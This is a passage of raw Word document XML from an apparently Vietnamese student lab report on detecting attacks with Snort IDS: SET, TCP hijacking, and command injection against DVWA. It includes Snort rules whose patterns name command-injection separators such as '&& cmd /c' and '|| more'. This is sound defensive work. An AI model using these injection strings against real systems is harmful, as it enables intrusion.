                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="08247C6D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Trên kali snort</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF5BBA6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Rule:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D1F9A5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">alert tcp any any -&gt; any any ( </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574DA953">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">    msg:"MALWARE-JPG: Long base64 string in JPG file"; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67799EBD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">    flow:established; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0C552B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">    file_data; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27BC7ED3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">    content:"|FF D9|"; within:4; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46710824">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">    pcre:"/[A-Za-z0-9+\/]{100,}={0,2}/"; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E1A469">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">    metadata:service http; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABBBA76">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">    classtype:trojan-activity; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E48053B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">    sid:1000003; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402A8D90">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">    rev:1; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77456B4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425F953B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Kết quả</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60627524">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5745480" cy="158115"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>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32"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5745480" cy="158115"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="61088399">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc18050"/>
      <w:bookmarkStart w:id="26" w:name="_Toc3230"/>
      <w:bookmarkStart w:id="27" w:name="_Toc26462"/>
      <w:bookmarkStart w:id="28" w:name="_Toc17769"/>
      <w:bookmarkStart w:id="29" w:name="_Toc28162"/>
      <w:bookmarkStart w:id="30" w:name="_Toc12154"/>
      <w:bookmarkStart w:id="31" w:name="_Toc12605"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Kết quả thực nghiệm</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
      <w:bookmarkEnd w:id="26"/>
      <w:bookmarkEnd w:id="27"/>
      <w:bookmarkEnd w:id="28"/>
      <w:bookmarkEnd w:id="29"/>
      <w:bookmarkEnd w:id="30"/>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p w14:paraId="055F9713">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_Toc5125"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Phát hiện tấn công Social Engineering Toolkit bằng IDS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w14:paraId="6CEFD1D5">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Kết quả trên kali snort phát hiện log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24946D4C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="none"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="none"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5734050" cy="1190625"/>
            <wp:effectExtent l="0" t="0" r="11430" b="13335"/>
            <wp:docPr id="24"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descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId33"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5734050" cy="1190625"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1AE552">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:vertAlign w:val="baseline"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_Toc23105"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="16"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Phát hiện tấn công TCP hijacking bằng IDS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p w14:paraId="79348B73">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Xem, thêm và xóa cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECCA248">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5755640" cy="622300"/>
            <wp:effectExtent l="0" t="0" r="5080" b="254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pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId34"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5755640" cy="622300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6601E326">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:vertAlign w:val="baseline"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5753735" cy="466090"/>
            <wp:effectExtent l="0" t="0" r="6985" b="6350"/>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pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId35"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5753735" cy="466090"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="339BC059">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:line="360" w:lineRule="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Phát hiện tấn công Command injection trên DVWA bằng Snort</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7FC65C">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Trên máy snort</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043D92C0">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Cài rule:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>alert tcp any any -&gt; any 8081 (msg:"WEB RCE DVWA - encoded or plain in TCP payload"; flow:to_server,established; pcre:"/(%7C%7C\+more\+|%26%26\+cmd\+%2Fc|%3EC%3A%5Cxampp%5Ctmp%5C|\|\|\s*more\s+|&amp;&amp;\s*cmd\s+\/c|&gt;C:\\\\xampp\\\\tmp\\\\)/i"; sid:1300001; rev:1; classtype:web-application-attack;)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741BBC52">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76B2B9BD">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="24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xml:space="preserve">Dùng </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="monospace" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="188038"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>alert tcp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t xml:space="preserve"> (không cần HTTP preprocessor) nên chắc chắn match raw POST body.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CAC1E99">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eastAsia="monospace" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="188038"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>pcre</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t xml:space="preserve"> bắt cả </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>URL-encoded</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eastAsia="monospace" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="188038"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>%7C%7C</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eastAsia="monospace" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="188038"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>%26%26</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eastAsia="monospace" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="188038"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>%3E...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t xml:space="preserve">) và </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>plain</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eastAsia="monospace" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="188038"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>|| more</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eastAsia="monospace" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="188038"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>&amp;&amp; cmd /c</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eastAsia="monospace" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="188038"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>&gt;C:\xampp\tmp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404ED458">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="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Kết quả trên snort</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F94FCE">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6172B94A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="none"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="none"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5734050" cy="419100"/>
            <wp:effectExtent l="0" t="0" r="11430" b="7620"/>
            <wp:docPr id="35"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9" descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId36"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5734050" cy="419100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A160E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="none"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AEF32DB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="0"/>
        <w:outlineLvl w:val="1"/>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3.8.5 Hiện biểu đồ và log các cuộc tấn công</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09625468">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5753100" cy="2464435"/>
            <wp:effectExtent l="0" t="0" r="7620" b="4445"/>
            <wp:docPr id="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2"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId37"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5753100" cy="2464435"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
